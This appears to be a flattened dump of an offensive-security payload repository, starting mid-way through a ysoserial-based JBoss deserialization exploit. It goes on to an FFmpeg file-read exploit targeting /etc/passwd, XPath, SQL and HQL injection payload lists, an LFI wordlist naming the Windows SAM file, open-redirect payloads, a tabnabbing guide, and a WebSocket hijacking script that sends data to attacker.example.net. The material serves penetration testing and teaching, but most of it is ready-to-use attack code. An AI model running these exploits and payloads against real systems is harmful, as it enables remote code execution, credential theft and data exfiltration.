len(sys.argv) < 2: 26 | parser.print_help() 27 | sys.exit(1) 28 | 29 | args = parser.parse_args() 30 | 31 | if not args.ysoserial_path: 32 | for path in ysoserial_default_paths: 33 | if os.path.exists(path): 34 | ysoserial_path = path 35 | else: 36 | if os.path.exists(args.ysoserial_path): 37 | ysoserial_path = args.ysoserial_path 38 | 39 | if ysoserial_path is None: 40 | print('[-] Could not find ysoserial JAR file') 41 | sys.exit(1) 42 | 43 | if len(args.target.split(":")) != 2: 44 | print('[-] Target must be in format IP:PORT') 45 | sys.exit(1) 46 | 47 | if not args.command: 48 | print('[-] You must specify a command to run') 49 | sys.exit(1) 50 | 51 | ip, port = args.target.split(':') 52 | 53 | print('[*] Target IP: {}'.format(ip)) 54 | print('[*] Target PORT: {}'.format(port)) 55 | 56 | gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) 57 | 58 | r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) 59 | 60 | if r.status_code == 200: 61 | print('[+] Command executed successfully') 62 | 63 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/README.md: -------------------------------------------------------------------------------- 1 | # FFmpeg HLS vulnerability 2 | FFmpeg is open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files. 3 | 4 | ## Exploits 5 | ``` 6 | 1. `./gen_xbin_avi.py file://<filename> file_read.avi` 7 | 2. Upload `file_read.avi` to some website that processes video files 8 | 3. (on server side, done by the videoservice) `ffmpeg -i file_read.avi output.mp4` 9 | 4. Click "Play" in the videoservice. 10 | 5. If you are lucky, you'll see the content of `<filename>` from the server. 
11 | ``` 12 | 13 | ## How it works (Explanations from neex - Hackerone links) 14 | The script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this: 15 | ``` 16 | #EXTM3U 17 | #EXT-X-MEDIA-SEQUENCE:0 18 | #EXTINF:1.0 19 | GOD.txt 20 | #EXTINF:1.0 21 | /etc/passwd 22 | #EXT-X-ENDLIST 23 | ``` 24 | To process a playlist ffmpeg concatenates all segments and processes them as a single file. 25 | To determine the type of this file FFmpeg uses the first segment of the playlist. 26 | FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file. 27 | 28 | So, the playlist above will be processed as follows: 29 | FFmpeg sees the #EXTM3U signature inside the GAB2 chunk and determines the file type as an HLS playlist. 30 | The file GOD.txt doesn't even exist, but its name is enough for FFmpeg to detect the file type as .txt. 31 | FFmpeg concatenates the contents of all segments of the playlist. As only one of the two segments actually exists, the result of the concatenation is just the contents of the file we want to retrieve. 32 | Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file. 
33 | 34 | ## Thanks to 35 | * [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831) 36 | * [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470) 37 | * [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p) 38 | * [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) 39 | -------------------------------------------------------------------------------- /XPATH Injection/README.md: -------------------------------------------------------------------------------- 1 | # XPATH injection 2 | 3 | > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. 4 | 5 | ## Summary 6 | 7 | * [Exploitation](#exploitation) 8 | * [Blind exploitation](#blind-exploitation) 9 | * [Out Of Band Exploitation](#out-of-band-exploitation) 10 | * [Tools](#tools) 11 | * [References](#references) 12 | 13 | ## Exploitation 14 | 15 | Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"` 16 | 17 | ```sql 18 | ' or '1'='1 19 | ' or ''=' 20 | x' or 1=1 or 'x'='y 21 | / 22 | // 23 | //* 24 | */* 25 | @* 26 | count(/child::node()) 27 | x' or name()='username' or 'x'='y 28 | ' and count(/*)=1 and '1'='1 29 | ' and count(/@*)=1 and '1'='1 30 | ' and count(/comment())=1 and '1'='1 31 | search=')] | //user/*[contains(*,' 32 | search=Har') and contains(../password,'c 33 | search=Har') and starts-with(../password,'c 34 | ``` 35 | 36 | ## Blind Exploitation 37 | 38 | 1. Size of a string 39 | ```sql 40 | and string-length(account)=SIZE_INT 41 | ``` 42 | 2. 
Extract a character 43 | ```sql 44 | substring(//user[userid=5]/username,2,1)=CHAR_HERE 45 | substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) 46 | ``` 47 | 48 | ## Out Of Band Exploitation 49 | 50 | ```powershell 51 | http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') 52 | ``` 53 | 54 | ## Tools 55 | 56 | - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents 57 | - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 58 | - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 59 | - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) 60 | - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool 61 | 62 | ## References 63 | 64 | * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) 65 | * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) 66 | -------------------------------------------------------------------------------- /Web Sockets/Files/ws-harness.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from __future__ import print_function 3 | import socket,ssl 4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer 5 | from websocket import create_connection, WebSocket 6 | from urlparse import parse_qs 7 | import argparse 8 | import os 9 | 10 | LOOP_BACK_PORT_NUMBER = 8000 11 | 12 | def FuzzWebSocket(fuzz_value): 13 | print(fuzz_value) 14 | ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0]))) 15 | result = ws.recv() 16 | return result 17 | 18 | def LoadMessage(file): 19 | file_contents = "" 20 | try: 21 | if os.path.isfile(file): 22 | f = open(file,'r') 23 | file_contents = f.read() 24 | 
f.close() 25 | except: 26 | print("Error reading file: %s" % file) 27 | exit() 28 | return file_contents 29 | 30 | class myWebServer(BaseHTTPRequestHandler): 31 | 32 | #Handler for the GET requests 33 | def do_GET(self): 34 | qs = parse_qs(self.path[2:]) 35 | fuzz_value = qs['fuzz'] 36 | result = FuzzWebSocket(fuzz_value) 37 | self.send_response(200) 38 | self.send_header('Content-type','text/html') 39 | self.end_headers() 40 | self.wfile.write(result) 41 | return 42 | 43 | parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets') 44 | parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True) 45 | parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True) 46 | args = parser.parse_args() 47 | 48 | ws_message = LoadMessage(args.message) 49 | 50 | ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080) 51 | 52 | try: 53 | #Create a web server and define the handler to manage the 54 | #incoming request 55 | server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer) 56 | print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER) 57 | 58 | #Wait forever for incoming http requests 59 | server.serve_forever() 60 | 61 | except KeyboardInterrupt: 62 | print('^C received, shutting down the web server') 63 | server.socket.close() 64 | ws.close() 65 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/LFI-WindowsFileCheck.txt: -------------------------------------------------------------------------------- 1 | php://input 2 | C:\boot.ini 3 | C:\WINDOWS\win.ini 4 | C:\WINDOWS\php.ini 5 | C:\WINDOWS\System32\Config\SAM 6 | C:\WINNT\php.ini 7 | C:\xampp\phpMyAdmin\config.inc 8 | C:\xampp\phpMyAdmin\phpinfo.php 9 | C:\xampp\phpmyadmin\config.inc 10 | 
C:\xampp\phpmyadmin\phpinfo.php 11 | C:\xampp\phpmyadmin\config.inc.php 12 | C:\xampp\phpMyAdmin\config.inc.php 13 | C:\xampp\apache\conf\httpd.conf 14 | C:\xampp\FileZillaFTP\FileZilla Server.xml 15 | C:\xampp\MercuryMail\mercury.ini 16 | C:\mysql\bin\my.ini 17 | C:\xampp\php\php.ini 18 | C:\xampp\phpMyAdmin\config.inc.php 19 | C:\xampp\tomcat\conf\tomcat-users.xml 20 | C:\xampp\tomcat\conf\web.xml 21 | C:\xampp\sendmail\sendmail.ini 22 | C:\xampp\webalizer\webalizer.conf 23 | C:\xampp\webdav\webdav.txt 24 | C:\xampp\apache\logs\error.log 25 | C:\xampp\apache\logs\access.log 26 | C:\xampp\FileZillaFTP\Logs 27 | C:\xampp\FileZillaFTP\Logs\error.log 28 | C:\xampp\FileZillaFTP\Logs\access.log 29 | C:\xampp\MercuryMail\LOGS\error.log 30 | C:\xampp\MercuryMail\LOGS\access.log 31 | C:\xampp\mysql\data\mysql.err 32 | C:\xampp\sendmail\sendmail.log 33 | C:\apache\log\error.log 34 | C:\apache\log\access.log 35 | C:\apache\log\error_log 36 | C:\apache\log\access_log 37 | C:\apache2\log\error.log 38 | C:\apache2\log\access.log 39 | C:\apache2\log\error_log 40 | C:\apache2\log\access_log 41 | C:\log\error.log 42 | C:\log\access.log 43 | C:\log\error_log 44 | C:\log\access_log 45 | C:\apache\logs\error.log 46 | C:\apache\logs\access.log 47 | C:\apache\logs\error_log 48 | C:\apache\logs\access_log 49 | C:\apache2\logs\error.log 50 | C:\apache2\logs\access.log 51 | C:\apache2\logs\error_log 52 | C:\apache2\logs\access_log 53 | C:\logs\error.log 54 | C:\logs\access.log 55 | C:\logs\error_log 56 | C:\logs\access_log 57 | C:\log\httpd\access_log 58 | C:\log\httpd\error_log 59 | C:\logs\httpd\access_log 60 | C:\logs\httpd\error_log 61 | C:\opt\xampp\logs\access_log 62 | C:\opt\xampp\logs\error_log 63 | C:\opt\xampp\logs\access.log 64 | C:\opt\xampp\logs\error.log 65 | C:\Program Files\Apache Group\Apache\logs\access.log 66 | C:\Program Files\Apache Group\Apache\logs\error.log 67 | C:\Program Files\Apache Group\Apache\conf\httpd.conf 68 | C:\Program Files\Apache 
Group\Apache2\conf\httpd.conf 69 | C:\Program Files\xampp\apache\conf\httpd.conf 70 | -------------------------------------------------------------------------------- /Open Redirect/Intruder/openredirects.txt: -------------------------------------------------------------------------------- 1 | /%09/example.com 2 | /%2f%2fexample.com 3 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ 4 | /%5cexample.com 5 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 6 | /.example.com 7 | //%09/example.com 8 | //%5cexample.com 9 | ///%09/example.com 10 | ///%5cexample.com 11 | ////%09/example.com 12 | ////%5cexample.com 13 | /////example.com 14 | /////example.com/ 15 | ////\;@example.com 16 | ////example.com/ 17 | ////example.com/%2e%2e 18 | ////example.com/%2e%2e%2f 19 | ////example.com/%2f%2e%2e 20 | ////example.com/%2f.. 21 | ////example.com// 22 | ///\;@example.com 23 | ///example.com 24 | ///example.com/ 25 | ///example.com/%2e%2e 26 | ///example.com/%2e%2e%2f 27 | ///example.com/%2f%2e%2e 28 | ///example.com/%2f.. 29 | ///example.com// 30 | //example.com 31 | //example.com/ 32 | //example.com/%2e%2e 33 | //example.com/%2e%2e%2f 34 | //example.com/%2f%2e%2e 35 | //example.com/%2f.. 
36 | //example.com// 37 | //google%00.com 38 | //google%E3%80%82com 39 | //https:///example.com/%2e%2e 40 | //https://example.com/%2e%2e%2f 41 | //https://example.com// 42 | /<>//example.com 43 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 44 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com 45 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 46 | /\/\/example.com/ 47 | /\/example.com/ 48 | /example.com/%2f%2e%2e 49 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d 50 | /http://example.com 51 | /http:/example.com 52 | /https:/%5cexample.com/ 53 | /https://%09/example.com 54 | /https://%5cexample.com 55 | /https:///example.com/%2e%2e 56 | /https:///example.com/%2f%2e%2e 57 | /https://example.com 58 | /https://example.com/ 59 | /https://example.com/%2e%2e 60 | /https://example.com/%2e%2e%2f 61 | /https://example.com/%2f%2e%2e 62 | /https://example.com/%2f.. 63 | /https://example.com// 64 | /https:example.com 65 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 66 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com 67 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 68 | -------------------------------------------------------------------------------- /Tabnabbing/README.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. 
As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [More information about the vulnerability](#More-information-about-the-vulnerability) 9 | * [How to exploit](#How-to-exploit) 10 | * [How to hunt for it](#How-to-hunt-for-it) 11 | * [References](#references) 12 | 13 | ## Tools 14 | 15 | - [Discover Reverse Tabnabbing - Burp Extension](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) 16 | 17 | ## More information about the vulnerability 18 | 19 | When hunting for tabnabbing, the attacker searches for links inserted into the website that are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, he checks that the link's `rel` attribute does not contain the value `noopener` and that the `target` attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. 20 | 21 | ## How to exploit 22 | ``` 23 | 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" 24 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 25 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 26 | 4. If the victim opens the background tab again and doesn't look at the address bar, he may think he has been logged out, because a login page appears, for example. 27 | 5. 
The victim tries to log on again and the attacker receives the credentials 28 | ``` 29 | 30 | ## How to hunt for it 31 | 32 | As already mentioned, you have to search for the following link formats: 33 | 34 | ```html 35 | <a href="..." target="_blank" rel="" /> 36 | or 37 | <a href="..." target="_blank" /> 38 | ``` 39 | 40 | ## References 41 | 42 | - [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) 43 | - [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing) 44 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass2.txt: -------------------------------------------------------------------------------- 1 | == 2 | = 3 | ' 4 | ' -- 5 | ' # 6 | ' – 7 | '-- 8 | '/* 9 | '# 10 | " -- 11 | " # 12 | "/* 13 | ' and 1='1 14 | ' and a='a 15 | or 1=1 16 | or true 17 | ' or ''=' 18 | " or ""=" 19 | 1′) and '1′='1– 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 22 | and 1=1 23 | and 1=1– 24 | ' and 'one'='one 25 | ' and 'one'='one– 26 | ' group by password having 1=1-- 27 | ' group by userid having 1=1-- 28 | ' group by username having 1=1-- 29 | like '%' 30 | or 0=0 -- 31 | or 0=0 # 32 | or 0=0 – 33 | ' or 0=0 # 34 | ' or 0=0 -- 35 | ' or 0=0 # 36 | ' or 0=0 – 37 | " or 0=0 -- 38 | " or 0=0 # 39 | " or 0=0 – 40 | %' or '0'='0 41 | or 1=1 42 | or 1=1-- 43 | or 1=1/* 44 | or 1=1# 45 | or 1=1– 46 | ' or 1=1-- 47 | ' or '1'='1 48 | ' or '1'='1'-- 49 | ' or '1'='1'/* 50 | ' or '1'='1'# 51 | ' or '1′='1 52 | ' or 1=1 53 | ' or 1=1 -- 54 | ' or 1=1 – 55 | ' or 1=1-- 56 | ' or 1=1;# 57 | ' or 1=1/* 58 | ' or 1=1# 59 | ' or 1=1– 60 | ') or '1'='1 61 | ') or '1'='1-- 62 | ') or '1'='1'-- 63 | ') or '1'='1'/* 64 | ') or '1'='1'# 65 | ') or ('1'='1 66 | ') or ('1'='1-- 67 | ') or ('1'='1'-- 68 | ') or ('1'='1'/* 69 | ') or ('1'='1'# 70 | 'or'1=1 71 | 'or'1=1′ 72 | " 
or "1"="1 73 | " or "1"="1"-- 74 | " or "1"="1"/* 75 | " or "1"="1"# 76 | " or 1=1 77 | " or 1=1 -- 78 | " or 1=1 – 79 | " or 1=1-- 80 | " or 1=1/* 81 | " or 1=1# 82 | " or 1=1– 83 | ") or "1"="1 84 | ") or "1"="1"-- 85 | ") or "1"="1"/* 86 | ") or "1"="1"# 87 | ") or ("1"="1 88 | ") or ("1"="1"-- 89 | ") or ("1"="1"/* 90 | ") or ("1"="1"# 91 | ) or '1′='1– 92 | ) or ('1′='1– 93 | ' or 1=1 LIMIT 1;# 94 | 'or 1=1 or ''=' 95 | "or 1=1 or ""=" 96 | ' or 'a'='a 97 | ' or a=a-- 98 | ' or a=a– 99 | ') or ('a'='a 100 | " or "a"="a 101 | ") or ("a"="a 102 | ') or ('a'='a and hi") or ("a"="a 103 | ' or 'one'='one 104 | ' or 'one'='one– 105 | ' or uid like '% 106 | ' or uname like '% 107 | ' or userid like '% 108 | ' or user like '% 109 | ' or username like '% 110 | ' or 'x'='x 111 | ') or ('x'='x 112 | " or "x"="x 113 | ' OR 'x'='x'#; 114 | '=' 'or' and '=' 'or' 115 | ' UNION ALL SELECT 1, @@version;# 116 | ' UNION ALL SELECT system_user(),user();# 117 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 118 | admin' and substring(password/text(),1,1)='7 119 | ' and substring(password/text(),1,1)='7 120 | ' or 1=1 limit 1 -- -+ 121 | '="or' 122 | -------------------------------------------------------------------------------- /Web Sockets/README.md: -------------------------------------------------------------------------------- 1 | # Web Sockets Attacks 2 | 3 | > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Using ws-harness.py](#using-ws-harness-py) 9 | 10 | ## Tools 11 | 12 | * [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) 13 | 14 | ## Using ws-harness.py 15 | 16 | Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint. 
17 | 18 | ```powershell 19 | python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt 20 | ``` 21 | 22 | The content of the message should contain the **[FUZZ]** keyword. 23 | 24 | ```json 25 | {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} 26 | ``` 27 | 28 | Then you can use any tool against the newly created web service, which works as a proxy and tampers on the fly with the content of the message sent through the websocket. 29 | 30 | ```python 31 | sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump 32 | ``` 33 | 34 | ## Cross-Site WebSocket Hijacking (CSWSH) 35 | 36 | If the WebSocket handshake is not correctly protected using a CSRF token or a 37 | nonce, it's possible to use the authenticated WebSocket of a user from an 38 | attacker-controlled site because the cookies are automatically sent by the 39 | browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). 40 | 41 | Example exploit, hosted on an attacker's server, that exfiltrates the received 42 | data from the WebSocket to the attacker: 43 | 44 | ```html 45 | <script> 46 | ws = new WebSocket('wss://vulnerable.example.com/messages'); 47 | ws.onopen = function start(event) { 48 | ws.send("HELLO"); 49 | } 50 | ws.onmessage = function handleReply(event) { 51 | fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'}); 52 | } 53 | ws.send("Some text sent to the server"); 54 | </script> 55 | ``` 56 | 57 | You have to adjust the code to your exact situation. E.g. if your web 58 | application uses a `Sec-WebSocket-Protocol` header in the handshake request, 59 | you have to add this value as a 2nd parameter to the `WebSocket` function call 60 | in order to add this header. 
61 | 62 | ## References 63 | 64 | - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) 65 | - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) 66 | - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) 67 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_TimeBased.txt: -------------------------------------------------------------------------------- 1 | # from wapiti 2 | sleep(5)# 3 | 1 or sleep(5)# 4 | " or sleep(5)# 5 | ' or sleep(5)# 6 | " or sleep(5)=" 7 | ' or sleep(5)=' 8 | 1) or sleep(5)# 9 | ") or sleep(5)=" 10 | ') or sleep(5)=' 11 | 1)) or sleep(5)# 12 | ")) or sleep(5)=" 13 | ')) or sleep(5)=' 14 | ;waitfor delay '0:0:5'-- 15 | );waitfor delay '0:0:5'-- 16 | ';waitfor delay '0:0:5'-- 17 | ";waitfor delay '0:0:5'-- 18 | ');waitfor delay '0:0:5'-- 19 | ");waitfor delay '0:0:5'-- 20 | ));waitfor delay '0:0:5'-- 21 | '));waitfor delay '0:0:5'-- 22 | "));waitfor delay '0:0:5'-- 23 | benchmark(10000000,MD5(1))# 24 | 1 or benchmark(10000000,MD5(1))# 25 | " or benchmark(10000000,MD5(1))# 26 | ' or benchmark(10000000,MD5(1))# 27 | 1) or benchmark(10000000,MD5(1))# 28 | ") or benchmark(10000000,MD5(1))# 29 | ') or benchmark(10000000,MD5(1))# 30 | 1)) or benchmark(10000000,MD5(1))# 31 | ")) or benchmark(10000000,MD5(1))# 32 | ')) or benchmark(10000000,MD5(1))# 33 | pg_sleep(5)-- 34 | 1 or pg_sleep(5)-- 35 | " or pg_sleep(5)-- 36 | ' or pg_sleep(5)-- 37 | 1) or pg_sleep(5)-- 38 | ") or pg_sleep(5)-- 39 | ') or pg_sleep(5)-- 40 | 1)) or pg_sleep(5)-- 41 | ")) or pg_sleep(5)-- 42 | ')) or pg_sleep(5)-- 43 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe 44 | AND (SELECT * FROM 
(SELECT(SLEEP(5)))YjoC) AND '%'=' 45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) 46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- 47 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# 48 | SLEEP(5)# 49 | SLEEP(5)-- 50 | SLEEP(5)=" 51 | SLEEP(5)=' 52 | or SLEEP(5) 53 | or SLEEP(5)# 54 | or SLEEP(5)-- 55 | or SLEEP(5)=" 56 | or SLEEP(5)=' 57 | waitfor delay '00:00:05' 58 | waitfor delay '00:00:05'-- 59 | waitfor delay '00:00:05'# 60 | benchmark(50000000,MD5(1)) 61 | benchmark(50000000,MD5(1))-- 62 | benchmark(50000000,MD5(1))# 63 | or benchmark(50000000,MD5(1)) 64 | or benchmark(50000000,MD5(1))-- 65 | or benchmark(50000000,MD5(1))# 66 | pg_SLEEP(5) 67 | pg_SLEEP(5)-- 68 | pg_SLEEP(5)# 69 | or pg_SLEEP(5) 70 | or pg_SLEEP(5)-- 71 | or pg_SLEEP(5)# 72 | '\" 73 | AnD SLEEP(5) 74 | AnD SLEEP(5)-- 75 | AnD SLEEP(5)# 76 | &&SLEEP(5) 77 | &&SLEEP(5)-- 78 | &&SLEEP(5)# 79 | ' AnD SLEEP(5) ANd '1 80 | '&&SLEEP(5)&&'1 81 | ORDER BY SLEEP(5) 82 | ORDER BY SLEEP(5)-- 83 | ORDER BY SLEEP(5)# 84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj) 85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# 86 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- 87 | +benchmark(3200,SHA1(1))+' 88 | + SLEEP(10) + ' 89 | RANDOMBLOB(500000000/2) 90 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 91 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 92 | RANDOMBLOB(1000000000/2) 93 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 94 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 95 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ 96 | -------------------------------------------------------------------------------- /SQL Injection/HQL Injection.md: -------------------------------------------------------------------------------- 1 | # Hibernate Query Language Injection 2 | 3 | > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. 
It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia 4 | ## Summary 5 | 6 | * [HQL Comments](#hql-comments) 7 | * [HQL List Columns](#hql-list-columns) 8 | * [HQL Error Based](#hql-error-based) 9 | * [References](#references) 10 | 11 | ## HQL Comments 12 | 13 | ```sql 14 | HQL does not support comments 15 | ``` 16 | 17 | ## HQL List Columns 18 | 19 | ```sql 20 | from BlogPosts 21 | where title like '%' 22 | and DOESNT_EXIST=1 and ''='%' -- 23 | and published = true 24 | ``` 25 | 26 | Using a non-existent column raises an exception that leaks several column names. 27 | 28 | ```sql 29 | org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement: 30 | select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159] 31 | ``` 32 | 33 | ## HQL Error Based 34 | 35 | ```sql 36 | from BlogPosts 37 | where title like '%11' 38 | and (select password from User where username='admin')=1 39 | or ''='%' 40 | and published = true 41 | ``` 42 | 43 | The error is based on value casting. 
44 | 45 | ```sql 46 | Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement: 47 | select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1 48 | ``` 49 | 50 | :warning: **HQL does not support UNION queries** 51 | 52 | ## References 53 | 54 | * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) 55 | * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) 56 | * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) 57 | * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) 58 | * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) 59 | -------------------------------------------------------------------------------- /Insecure Deserialization/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | > Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. 
Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP 4 | 5 | Check the following sub-sections, located in other files : 6 | 7 | * [Java deserialization : ysoserial, ...](Java.md) 8 | * [PHP (Object injection) : phpggc, ...](PHP.md) 9 | * [Ruby : universal rce gadget, ...](Ruby.md) 10 | * [Python : pickle, ...](Python.md) 11 | 12 | ## References 13 | 14 | * [Github - ysoserial](https://github.com/frohoff/ysoserial) 15 | * [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) 16 | * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 17 | * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 18 | * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 19 | * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 20 | * [PHP Object Injection - 